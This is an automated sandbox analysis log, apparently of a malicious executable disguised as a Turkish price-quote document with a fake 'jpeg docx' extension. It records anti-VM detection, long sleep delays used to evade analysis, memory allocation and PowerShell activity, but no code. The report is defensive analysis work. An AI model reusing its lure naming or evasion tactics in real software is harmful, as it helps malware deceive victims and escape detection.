                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe PID: 4692, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeMemory allocated: 1410000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeMemory allocated: 3390000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeMemory allocated: 31D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeMemory allocated: 8FF0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeMemory allocated: 7B80000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeMemory allocated: 9FF0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeMemory allocated: AFF0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeMemory allocated: 1070000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeMemory allocated: 2C10000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeMemory allocated: 2960000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599891Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599667Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599563Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599438Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599313Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599188Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599078Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598969Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598844Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598735Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598610Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598485Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598360Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598235Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598110Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597985Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597860Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597735Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597610Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597485Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597360Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597235Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597110Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596985Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596860Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596735Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596610Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596485Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596360Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596235Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596110Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595985Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595860Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595735Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595610Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595485Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595360Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595235Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595110Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594985Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594860Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594735Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594610Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594485Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594360Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594235Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594110Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeThread delayed: delay time: 593985Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6033Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3714Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeWindow / User API: threadDelayed 2298Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeWindow / User API: threadDelayed 7513Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeWindow / User API: foregroundWindowGot 1751Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 2412Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7292Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -26747778906878833s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7352Thread sleep count: 2298 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -599891s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7352Thread sleep count: 7513 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -599781s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -599667s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -599563s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep count: 38 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -599438s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -599313s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -599188s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -599078s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -598969s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -598844s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -598735s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -598610s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -598485s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -598360s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -598235s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -598110s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -597985s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -597860s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -597735s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -597610s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -597485s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -597360s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -597235s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -597110s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -596985s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -596860s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -596735s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -596610s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -596485s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -596360s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -596235s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe TID: 7344Thread sleep time: -596110s >= -30000sJump to behavior
